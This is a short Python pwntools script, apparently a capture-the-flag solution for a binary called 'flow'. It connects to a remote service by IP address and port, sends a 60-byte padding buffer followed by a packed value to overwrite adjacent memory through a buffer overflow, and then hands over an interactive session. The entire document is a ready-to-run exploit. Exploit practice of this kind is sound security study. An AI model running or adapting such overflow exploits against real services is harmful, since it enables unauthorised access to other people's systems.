#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./flow", checksec=False)
# r = process()
r = remote("94.72.112.248", 7001)

# funcs
s = lambda a: r.sendlineafter(b": ", a)

# buf
buf = b"A"*60
buf += p32(0x34333231)
s(buf)

r.interactive()